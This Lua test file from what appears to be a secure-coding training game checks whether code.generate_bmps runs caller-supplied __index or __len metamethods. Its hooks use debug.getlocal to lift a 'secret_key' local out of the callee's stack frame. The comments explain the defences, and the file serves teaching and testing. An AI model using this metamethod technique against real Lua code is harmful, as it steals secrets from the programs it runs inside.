-- This file exploits the vulnerabilities in code. Running this file will fail initially
-- (it contains failing tests). As in all other levels, your goal is to get this file to pass.
-- Run them by opening a terminal and running the following:
-- $ (cd Season-3/Level-1/ && lua hack.lua)
local code = require("code")
--- Regression check: does code.generate_bmps run a caller-supplied __index hook?
-- The request has a hole at position 2, so any metamethod-aware read of that
-- slot (or of any other missing key) calls the hook inside generate_bmps.
-- Prints `true` when the hook never ran and `false` when it did. The outcome
-- is only printed; nothing here raises an error or sets an exit status.
-- Defensive reading: code that receives tables from an untrusted caller should
-- reject tables that carry a metatable, or read them with rawget/rawlen, so
-- that no caller-defined function runs inside the callee.
local function indexHookExploit()
  local hook_ran = false
  local hooked_mt = {
    -- With __metatable set, getmetatable(request) returns this empty table
    -- rather than the real metatable, and setmetatable(request, ...) raises an
    -- error. The callee can still detect that a metatable exists, but it
    -- cannot strip it.
    __metatable = {},
    __index = function(og_table, index)
      print("[SCRIPT EXECUTING]")
      hook_ran = true
      -- debug.getlocal has to be called from this function body: level 2 is
      -- counted from the caller of getlocal, i.e. the frame whose table access
      -- triggered the hook. Moving the call into a helper would shift the level.
      local captured = {}
      local slot = 1
      local name, value = debug.getlocal(2, slot)
      while name ~= nil do
        captured[name] = value
        slot = slot + 1
        name, value = debug.getlocal(2, slot)
      end
      -- Copy the triggering frame's `secret_key` local (nil when absent) onto
      -- the request table so the check below can report it.
      og_table.recieving_payload = captured["secret_key"]
      return "Get PWNED"
    end,
  }
  local odd_request = {
    { source = "Legit link", image = nil },
    nil,
    { source = "Another legit link", image = nil },
  }
  local request = setmetatable(odd_request, hooked_mt)
  local result = code.generate_bmps(request)
  -- NOTE(review): if generate_bmps hands back the request table itself without
  -- the field set, the lookups below go through __index again and trip the
  -- flag from this file -- confirm against the return value of generate_bmps.
  if type(result) == "table" and result.recieving_payload ~= nil then
    print("Malicous payload recieved: ", result.recieving_payload)
  end
  print(not hook_ran)
end
--- Regression check: does code.generate_bmps run a caller-supplied __len hook?
-- The request is a well-formed three-entry list, so the hook only runs when
-- the callee takes the length with the metamethod-aware `#` operator.
-- Prints `true` when the hook never ran and `false` when it did. The outcome
-- is only printed; nothing here raises an error or sets an exit status.
-- Caveat: Lua 5.1 ignores __len on tables, so this check exercises Lua 5.2+.
-- Defensive reading: take the length of untrusted tables with rawlen, or
-- reject tables that carry a metatable before touching them.
local function lengthHookExploit()
  local hook_ran = false
  local hooked_mt = {
    -- With __metatable set, getmetatable(request) returns this empty table
    -- rather than the real metatable, and setmetatable(request, ...) raises an
    -- error, so the callee cannot simply strip the hook.
    __metatable = {},
    __len = function(og_table)
      print("[SCRIPT EXECUTING]")
      hook_ran = true
      -- debug.getlocal has to be called from this function body: level 2 is
      -- counted from the caller of getlocal, i.e. the frame whose length
      -- operation triggered the hook. A helper would shift the level.
      local captured = {}
      local slot = 1
      local name, value = debug.getlocal(2, slot)
      while name ~= nil do
        captured[name] = value
        slot = slot + 1
        name, value = debug.getlocal(2, slot)
      end
      -- Copy the triggering frame's `secret_key` local (nil when absent) onto
      -- the request table so the check below can report it.
      og_table.recieving_payload = captured["secret_key"]
      -- Report the true element count so the callee carries on normally.
      return 3
    end,
  }
  local odd_request = {
    { source = "Legit link", image = nil },
    { source = "Another legit link", image = nil },
    { source = "Another legit boring link", image = nil },
  }
  local request = setmetatable(odd_request, hooked_mt)
  local result = code.generate_bmps(request)
  if type(result) == "table" and result.recieving_payload ~= nil then
    print("Malicous payload recieved: ", result.recieving_payload)
  end
  print(not hook_ran)
end
-- Run both metamethod checks, length hook first; each prints `true` on a pass.
for _, check in ipairs({ lengthHookExploit, indexHookExploit }) do
  check()
end